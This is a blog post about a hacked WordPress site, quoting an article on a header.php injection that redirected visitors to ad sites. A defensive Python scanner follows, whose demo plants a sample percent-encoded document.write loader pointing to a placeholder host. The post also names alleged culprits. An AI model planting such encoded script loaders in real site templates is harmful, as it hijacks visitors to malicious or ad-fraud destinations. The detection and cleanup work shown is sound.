Tvillingliv.se has been compromised!

It's not as bad as it sounds, but some of you have had warnings pop up from your antivirus programs when visiting the site, which got me digging around in the code.

Sure enough, I found a very mysterious piece of code under the 'head' tag in header.php… So how did this happen? Apparently this job was done by some sort of known Russian hacker named Sergey Ryabov. All the code was meant to do was redirect the traffic to ad sites. However, it hasn't really worked on Tvillingliv. Most likely this happened right before I updated the site to the newest version, and then this hack doesn't work.

The threat is gone now, and I have also installed a "WordPress Firewall" that should block this type of attack.

Now all you sweet readers are safe again!
For more detailed information about this hack and how to fix it, and how to prevent it in the future, read here.

Handing the floor back to my beloved partner!
I'm guessing she'll snort at me having scribbled on the blog. 😉

There is a brand new WordPress hack attack making the rounds, that redirects all traffic to your site through itsallbreaksoft.net and paymoneysystem.info, and then on to any number of junk sites full of ads. The intermediate redirect to paymoneysystem.info actually goes through the URL paymoneysystem.info/in.cgi?michaeleknowlton, suggesting that someone using the name Michael Knowlton is going to be benefiting from any monies earned by the advertising. Here’s how it was done, and how to fix it. Fortunately, the immediate fix is very easy.

Here is how it was done – the bad guys either injected the below code into the header.php file (this is found in your /wp-content/themes/{your theme name here}/ directory) – or they simply sucked down your header file, modified it on their end to include the below code, and then overwrote your header.php file with the newly modified one.

This is the code that has been added to your header.php file:


This gobbledygook actually resolves to a script that redirects your visitors to itsallbreaksoft.net and on to paymoneysystem.info, through “Michael Knowlton’s” affiliate ID.

To perform an immediate fix, simply remove the code from your header.php file, and then make sure that your header.php file isn’t writable by anyone other than you.
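A defender-side triage helper for the scenario above, as an added example (not code from the original post or from any WordPress plugin): it looks for the document.write(unescape(...)) loader in theme files, decodes its first percent-encoded layer so you can read what was planted, and reports files that are group- or world-writable, the condition the fix tells you to remove. The regex, the demo() sample theme and the placeholder host example.invalid are all constructed here.

```python
# Triage helper for the header.php injection above: find the loader, decode it, flag writable files.
import os
import re
import stat
import tempfile
from urllib.parse import unquote

# Loader signature: document.write(unescape('<quoted string with runs of %xx escapes>'))
LOADER_RE = re.compile(
    r"document\.write\s*\(\s*unescape\s*\(\s*['\"]"
    r"([^'\"]*(?:%[0-9A-Fa-f]{2}){4}[^'\"]*)['\"]\s*\)\s*\)", re.IGNORECASE)

def find_loaders(text):
    """Decoded first layer of each loader in text. JavaScript unescape() and Python
    unquote() agree on %xx escapes, which is all this loader uses."""
    return [unquote(m.group(1)) for m in LOADER_RE.finditer(text)]

def is_writable_by_others(path):
    """True if the group or world write bit is set; only you should be able to write header.php."""
    return bool(os.stat(path).st_mode & (stat.S_IWGRP | stat.S_IWOTH))

def scan_theme(theme_dir):
    """Walk a theme dir; return {relative path: {"loaders": [...], "writable": bool}}
    for each file that carries a loader or is writable by group/others."""
    findings = {}
    for root, _dirs, files in os.walk(theme_dir):
        for name in files:
            if not name.endswith((".php", ".js", ".html")):
                continue
            path = os.path.join(root, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                loaders = find_loaders(fh.read())
            writable = is_writable_by_others(path)
            if loaders or writable:
                findings[os.path.relpath(path, theme_dir)] = {"loaders": loaders, "writable": writable}
    return findings

def demo():
    """Constructed sample theme: a group-writable header.php carrying a loader that decodes
    to a script tag for the placeholder host example.invalid, plus a clean footer.php."""
    plain = '<script src="http://example.invalid/in.cgi"></script>'
    encoded = "".join("%%%02X" % ord(c) for c in plain)  # fully percent-encoded, as in the real one
    injected = "<head>\n<script language=javascript>document.write(unescape('%s'))</script>\n" % encoded
    theme = tempfile.mkdtemp()
    for name, body, mode in (("header.php", injected, 0o664), ("footer.php", "<?php wp_footer(); ?>\n", 0o644)):
        path = os.path.join(theme, name)
        with open(path, "w") as fh:
            fh.write(body)
        os.chmod(path, mode)
    return scan_theme(theme)
```

Run scan_theme() against /wp-content/themes/{your theme name here}/ on a copy of the site; anything it reports is worth reading by hand before you delete it, since the decoded layer names the host the visitors were being sent to.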

It turns out that the people behind this seem to be a pretty well-known group from Russia, with the main person being one Sergey Ryabov, who uses the email address director at climbing-games dot com. [Ed. Note: We’d love to talk with Mr. Ryabov, to learn more about his operations and how and why he’s able to pull off this kind of hijinx.]

As to how they were able to do this, it’s not yet clear, but if you are running an old version of WordPress – especially a 2.6x version – be sure to upgrade if at all possible.

We also were recently turned onto a great WordPress firewall plugin that is very small and very easy to install, and you can check out the WordPress Firewall plugin here.

One reaction to “Tvillingliv.se has been compromised!”

  1. Grateful that you removed the filth. Don't think I'll dig into it any more than that. Hugs/Ma
